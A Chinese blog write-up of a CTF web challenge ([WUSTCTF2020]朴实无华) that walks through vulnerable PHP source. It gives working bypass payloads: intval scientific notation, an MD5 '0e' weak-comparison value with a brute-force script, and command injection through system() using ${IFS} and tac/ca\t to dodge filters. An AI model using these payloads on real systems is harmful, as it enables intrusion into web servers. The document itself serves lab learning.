BUUCTF之[WUSTCTF2020]朴实无华 --------------- MD5碰撞

最新推荐文章于 2023-12-25 09:58:39 发布
最新推荐文章于 2023-12-25 09:58:39 发布
阅读量682 收藏 3
点赞数
分类专栏: MD5类型 CTF-WEB 文章标签: MD5碰撞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44632787/article/details/120639813
版权

在这里插入图片描述

启动挑战页面
在这里插入图片描述

访问一下robots.txt看看有没有什么提示
在这里插入图片描述
发现有个可疑的链接:/fAke_f1agggg.php
在这里插入图片描述
在这里插入图片描述
到这里就可以看到重要的源码了

<img src="/img.jpg">
<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);


//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "鎴戜笉缁忔剰闂寸湅浜嗙湅鎴戠殑鍔冲姏澹�, 涓嶆槸鎯崇湅鏃堕棿, 鍙槸鎯充笉缁忔剰闂�, 璁╀綘鐭ラ亾鎴戣繃寰楁瘮浣犲ソ.</br>";
    }else{
        die("閲戦挶瑙e喅涓嶄簡绌蜂汉鐨勬湰璐ㄩ棶棰�");
    }
}else{
    die("鍘婚潪娲插惂");
}
//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "鎯冲埌杩欎釜CTFer鎷垮埌flag鍚�, 鎰熸縺娑曢浂, 璺戝幓涓滄緶宀�, 鎵句竴瀹堕鍘�, 鎶婂帹甯堣桨鍑哄幓, 鑷繁鐐掍袱涓嬁鎵嬪皬鑿�, 鍊掍竴鏉暎瑁呯櫧閰�, 鑷村瘜鏈夐亾, 鍒灏忔毚.</br>";
   else
       die("鎴戣刀绱у枈鏉ユ垜鐨勯厭鑲夋湅鍙�, 浠栨墦浜嗕釜鐢佃瘽, 鎶婁粬涓€瀹跺畨鎺掑埌浜嗛潪娲�");
}else{
    die("鍘婚潪娲插惂");
}

//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "鎯冲埌杩欓噷, 鎴戝厖瀹炶€屾鎱�, 鏈夐挶浜虹殑蹇箰寰€寰€灏辨槸杩欎箞鐨勬湸瀹炴棤鍗�, 涓旀灟鐕�.</br>";
        system($get_flag);
    }else{
        die("蹇埌闈炴床浜�");
    }
}else{
    die("鍘婚潪娲插惂");
}
?>

但是不知道为什么,我这里显示的中文全是乱码的。所以稍微改一改:

<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);


echo "<br>";
//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "第一关通过.</br>";
    }else{
        die("第一关失败");
    }
}else{
    die("请输入变量num");
}
//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "第二关成功.</br>";
   else
       die("第二关失败");
}else{
    die("请输入变量md5");
}

//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "第三关成功.</br>";
        system($get_flag);
    }else{
        die("第三关失败");
    }
}else{
    die("请输入变量get_flag");
}
?>

可以看到这里有三关,绕过这三关后才能获取flag
第一关: 传入一个变量num,经过intval函数转换后使得它小于2020.但是加1后要大于2021

if(intval($num) < 2020 && intval($num + 1) > 2021)

这关的主要难点是就是intval,所以我们需要查查看intval是什么东西:intval函数
因为我很久之前做过这道题,当时看了一位大佬的解说这里可以绕过。所以有印象…
在这里插入图片描述
为了验证是否正确,所以写了简单的测试:

<?php
header('Content-type:text/html;charset=utf-8');
$num = $_GET['num'];
$res1 = intval($num);
$res2 = intval($num + 1);

echo $res1;
echo "<br>";
echo $res2;
echo "<br>";
?>

然后输入num=1000e10看看能不能绕过这里,结果是可以的:
在这里插入图片描述

第二关: 传入一个变量md5,并且这个变量经过MD5加密后。这两个值相等

$md5=$_GET['md5'];
if ($md5==md5($md5))

两个等于号,说明是MD5弱碰撞。即:0e123456 == 0e654321
但是这里的难点是,什么样的字符串满足:

  • 加密前以0e开头+数字
  • 加密后也是以0e开头+数字

这里没有什么技巧可言,所以这里我用暴力破解来找出这个字符串。这里附上Python3代码:

import hashlib
from queue import Queue

"""
使用广度优先搜索来暴力破解MD5碰撞
"""
str = "0123456789"
Q = Queue()     # 创建一个队列
Q.put("0e")
MD5_KEY = 0
MD5_VALUE = 0

while not Q.empty():    # 当队列不为空时
    temp = Q.get()
    # print(temp)
    for s in str:
        strings = temp + s
        Q.put(strings)
        md5 = hashlib.md5()  # 获取一个md5加密算法对象
        md5.update(strings.encode('utf-8'))  # 指定需要加密的字符串
        md5_value = md5.hexdigest()  # 获取加密后的16进制字符串
        if md5_value[0:2] == "0e" and md5_value[2:].isdigit():
            print("----------------------------------------------------------------------------------")
            print(strings)
            print(md5_value)
            print("----------------------------------------------------------------------------------")


print("---------------------------------完成-------------------------------------")

这份代码需要运行20分钟左右才会出答案 。并且我这里写的是个死循环,所以它不会正常结束。所以等到它暴力破解出正确答案后就可以停止运行了。当然你也可以让它继续运行,但是这样它会不断的需要分配内存。直到产生错误。。。。
在这里插入图片描述
可以看到字符串:0e215962017 是满足的。
一开始我是用深度优先搜索来暴力破解的,但是做不出来。所以才改成广度优先搜索来做…
所以第二关为:md5=0e215962017

第三关: 传入一个变量get_flag,并且这个变量不能用空格

$get_flag = $_GET['get_flag'];
if(!strstr($get_flag," "))

也不能有字符串"cat"

$get_flag = str_ireplace("cat", "wctf2020", $get_flag);

首先是绕过空格,可以看这篇文章
根据这篇文章,我们可以用这些符号来绕过:

  • ${IFS}
  • $IFS$9
  • <
  • <>

至于cat绕过,我们可以用tacca\t来绕过。
所以这一关,我们可以写成以下的其中一种:

tac${IFS}flag
tac$IFS$9flag
tac<flag
tac<>flag
ca\t${IFS}
ca\t$IFS$9
ca\t<
ca\t<>flag

所以总的Payload为:?num=1000e10&md5=0e215962017&get_flag=tac${IFS}flag。
但是你会发现这样并不能获取flag,因为没有flag这个文件。
所以我们需要先用ls命令来看看当前目录下可疑的文件
在这里插入图片描述
因为fAke_f1agggg.phpfl4g.php这两个文件我们上面就访问过了,所以这里我们访问fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag 看看能不能获取flag。
所以最终Payload为:

?num=1000e10	
&md5=0e215962017
&get_flag=tac${IFS}fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

在这里插入图片描述

若丶时光破灭
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buu做题笔记——[WUSTCTF2020]朴实无华&[BSidesCF 2020]Had a bad day
weixin_46330722的博客
11-07 440
BUU[WUSTCTF2020]朴实无华robots.txtresponselevel 1level 2level 3[BSidesCF 2020]Had a bad day [WUSTCTF2020]朴实无华 robots.txt 进入题目界面就一个Hack me,抓包也没看到啥有用的。dirsearch开启 ! 扫一扫有没有什么有用的,但是全都429,只能手动扫描了。备份文件,git泄露,robots协议…全都试一遍 。终于在robots.txt里找到了有用的东西。 response 访问是一个有
bemaker:WELL项目建设者
06-09
安装 npm install bemaker项目文件结构Bemaker 对文件结构尽可能朴实无华。 与常规文件一起, 也包含在程序集中。 预计有一个包含块目录的目录,在每个目录中,块文件位于任意层次结构中。 例如: blocks/ button/ ...
BUUCTF】[WUSTCTF2020]朴实无华
aoao331198的博客
05-01 1593
为什么打开robots.txt,一是看见源码中有提示,二是应该在没有思路时作为常规操作 显示flag也不会在里面 打开这个文件,看见源码 <img src="/img.jpg"> <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //level 1 if (isset($_GET['num'])){ $num = $_GET.
CTF中的md5弱比较的绕过大全
qq_53863234的博客
10-13 1415
0x01.一次md5的加密 $a=$_GET['a']; $b=$_GET['b']; md5($a)==md5($b); payload: 1.a[]=0&b[]=0 2.a=QNKCDZO&b=s878926199a 分享一些加密为0e开头的字符串 QNKCDZO 0e830400451993494058024219903391 s878926199a 0e545993274517709034328855841020 s155964671a 0e342768416822451524
BUUCTF WEB 朴实无华1
qq_41696858的博客
12-21 178
打开场景,一堆乱码,让我们不要看headers,那不用说了,肯定hint在headers里面,burp抓包,当前页面headers没有啥的 那就扫目录吧,扫出来一个robots.txt,进 有一个fAke_flaaaaag.php,很明显是假的,我们再看headers头还是没有啥有用的 访问/fAke_flaaaaag.php,这次抓包发现一个look at me头,终于发现了正确的flag地址:/fl4g.php 什么,这就满足了?naive!访问下来是一堆源码,代码审计 <?php header(
[WUSTCTF2020]朴实无华 1
m0_62879498的博客
05-07 1218
[WUSTCTF2020]朴实无华 1 进入环境,什么也没有得到,估计就是需要我们进行目录扫描了 用dirsearch进行把爆破扫描 环境的问题,很多的环境在进行扫描的时候,如果访问过快,就会返回429 ,建议将线程数调小,否则会出现文件 429请况,影响结果 dirsearch.py -e bak,zip,tgz,txt -u https://target -t 30 我们尝试访问文件 访问 fAke_f1agggg.php 使用 bp抓包 查看情况 发现了新的文件,尝试访问 发现了朱
创想颖峰学校OA系统 v5.91.zip
07-12
1、界面简洁,朴实无华。各种功能,一览无遗,简单实用。 2、配合OA精灵使用,迅速、及时。使学校内部通知、邮件通行无阻,及时传递。 3、除了基本办公功能,集成学校常见的功能。专业、专注、实用,例如部门文件...
绿色实用教师说课公开课PPT模板下载.zip
07-16
幻灯片设计朴实无华,但是非常的贴切教师公开课主题。PPT模板封面以几束绿色波浪线为背景,搭配手拿铅笔的PPT动画,引出教师公开课的课题名称; PPT模板内容页面,同样使用了绿色为背景色设计的一套幻灯片图表,...
图片排版设计的公司简介产品宣传PPT模板.zip
07-16
PPT模板界面设计朴实无华,非常实用。 PowerPoint模板内容页面,由25张蓝色商务PPT图表制作。另外使用了团队照片、办公图片、职场白领等图片进行点缀。 本模板适合用于制作各类企业公司简介PPT,产品介绍宣传幻灯...
羽毛笔博士帽背景的毕业论文答辩PPT模板.zip
07-16
这是一套羽毛笔博士帽背景的,毕业...界面设计朴实无华非常实用。 PowerPoint模板内容页面由24张蓝色扁平化幻灯片图表制作。 本模板适合用于制作各专业毕业答辩PowerPoint,以及毕业论文开题报告PPT等。.PPTX格式;
[WUSTCTF2020]朴实无华1
最新发布
whale_waves的博客
12-25 539
这里利用到intval的漏洞,传入科学计数法时只会要e之前的数字,如果传入1e10,intval(1e4)=1,但是intval(1e4+1)=10001,因为这里是科学计数法加算数,所以会先计算了,在取值,所以理论上来说只要e前面的数字小于2000,并且科学计算以后大于2001就能绕过。首先strstr(1,2)会匹配1里2出现的地方以后的剩余的所有字符(空格用/**/替换)跑buuctf的题需要限速显示,不然跑太快了会429报错。这里需要让他原本弱等于md5以后的自己。打开以后,点击ie浏览器的图标。
[WUSTCTF2020]朴实无华1--writeup
m0_65080524的博客
08-15 155
而1e4其实等于10000 这是一种科学计数法,具体来说,1e4 中的 1 表示基数(也称为尾数或有效数字),而 4 表示指数。这可以解释为 1 乘以 10 的 4 次方,即 1 * 10^4,等于 10000。要求是原值与md5值进行弱比较相等 而有一个值正好即0e215962017 因为是弱比较,而且0e215962017的md值也是0e开头所以它们弱比较即是0=0。intval()函数作用是在处理数据时会在接触到字符串时停止,即11y58=11,x58=0,1e4=1。发现fl4g.php点开看看。
buuctf-[WUSTCTF2020]朴实无华
2202_75317918的博客
09-19 311
buuctf-[WUSTCTF2020]朴实无华
BUUCTF:[WUSTCTF2020]朴实无华
末初的CSDN博客
06-24 1036
首先在下发现 访问有一个假的flag,但是在响应头中找到一个提示,另外还有一个值得注意的是这里是 访问得到 PHP5中的函数中科学计数法符号无效,只会当作正常字符处理 所以这里利用科学计数法的符号就可以绕过level 1level 2直接可参考我的这篇文章:浅谈PHP中哈希比较缺陷问题及哈希强比较相关问题最后直接绕过和即可...
BUUCTF-社团考核
qq_60905276的博客
09-24 1019
BUUCTF上面的题
CTF:PHP MD5函数0E绕过漏洞
热门推荐
06-01 1万+
CTF:PHP MD5函数0E绕过漏洞 作者:高玉涵 博客:blog.csdn.net/cg_i 时间:2021.6.1 8:43 背景 昨天参加了一场CTF线上赛,面对行业内的安全强队,比赛成绩相差巨大。通过这次比赛,找到了差距,找到了不足,更增长了知识。子曰:“学而不思则罔,思而不学则殆。”计划将经后每次比赛,解题过程中的困惑、思路、整理后分享出来,以达起到巩固知识,也便于帮助有需要的人。因个人能力所限,文中难免会有错误,不妥之处还请批评指正。 赛题源码 ...
MD5绕过总结
qq_74035288的博客
05-14 232
数组绕过。
PHP—MD5和sha1绕过
cosmoslin的博客
10-26 6545
1 数组绕过 对于php强比较和弱比较:md5(),sha1()函数无法处理数组,如果传入的为数组,会返回NULL,所以两个数组经过加密后得到的都是NULL,也就是相等的。 <?php $a=$_GET['a']; $b=$_GET['b']; if ($a!==$b && md5($a)===md5($b)){ return "hahaha"; } 使用: ?a[]=1&b[]=2 2 0e绕过弱比较 对于某些特殊的字符串加密后得到的密文以0e开头,PHP会当作科
BUUCTF(web刷题记录一)
nareku的博客
04-16 8532
前言 涨知识的一天 打开一看是简单计算器,随便输入看看 发现字母输入不了,查看源码 发现是在calc.php里面计算的,而且提示说存在Waf,这些字母应该就是Waf过滤的,访问calc.php <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' '
[WUSTCTF2020]朴实无华
09-19
[WUSTCTF2020]朴实无华是一道CTF比赛的题目。根据给出的代码,该题目包含三个关卡。在第一个关卡中,如果传入的参数$num的整数值小于2020且大于2021,会输出一条特定的字符串。在第二个关卡中,如果传入的参数$md5的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值